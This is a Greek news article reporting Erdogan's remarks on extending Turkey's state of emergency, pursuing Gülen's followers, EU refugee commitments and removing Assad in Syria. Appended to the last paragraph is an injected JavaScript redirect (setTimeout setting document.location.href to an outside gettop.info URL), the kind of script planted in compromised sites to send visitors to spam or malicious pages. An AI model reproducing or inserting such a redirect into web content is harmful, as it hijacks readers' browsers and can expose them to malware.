Παράταση της έκτακτης ανάγκης στην Τουρκία προαναγγέλλει ο Ερντογάν

0
5

 

Το ενδεχόμενο να παραταθεί η ισχύς της κατάστασης έκτακτης ανάγκης στην Τουρκία, υπογράμμισε ο Ρετζέπ Ταγίπ Ερντογάν.

«Μπορεί να παρατεθεί για τρεις ή για έναν μήνα. Οι άνθρωποι του Γκιουλέν έχουν διεισδύσει παντού. Θα βρούμε τους πραξικοπηματίες αυτούς και θα συνεχιστούν οι συλλήψεις. Σ’ αυτό θα βοηθήσει η παράταση της κατάστασης έκτακτης ανάγκης».

Ως προς τις σχέσεις με την ΕΕ με αφορμή του προσφυγικό ζήτημα, ο Ερντογάν είπε ότι η Τουρκία τήρησε τις υποσχέσεις της προς την ΕΕ. Αλλά πρόκειται για αμφίδρομη κατάσταση. Παρά τις προσπάθειες της Τουρκίας, η ΕΕ απέτυχε στα καθήκοντα που ανέλαβε.

Ο Ερντογάν, αναφερόμενος στο γεγονός ότι ο χότζας Φετουλάχ Γκιουλέν βρίσκεται στις ΗΠΑ, είπε ότι οι τουρκικές αρχές έχουν ζητήσει τη στήριξη διαφόρων χωρών ώστε να δοθεί τέλος τις δραστηριότητες του Γκιουλέν.

Ως προς τις ΗΠΑ είπε «είμαστε σύμμαχοι, στρατηγικοί εταίροι και σύμμαχοι στο ΝΑΤΟ. Όταν εκείνοι ζητούν από μας κάποιον τρομοκράτη τους τον δίνουμε«.

Αναφερόμενος στο θέμα της Συρίας, ο Ερντογάν είπε ότι προϋπόθεση για την οικοδόμηση της ειρήνης στη Συρία είναι να απομακρυνθεί ο Άσαντ, ότι το PYD, η οργάνωση των Κούρδων της Συρίας, «είναι απειλή για την Τουρκία» και ότι σε περίπτωση επέμβασης στη Ράκα η Τουρκία δεν θα κινηθεί μονομερώς, αλλά μαζί με τους συμμάχους.

Σύμφωνα με τον Ερντογάν η μεταβατική περίοδος στη Συρία δεν πρέπει να περιλαμβάνει τον Άσαντ και η διεθνής κοινότητα πρέπει να βρει μια λύση που δεν θα περιλαμβάνει τον Άσαντ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here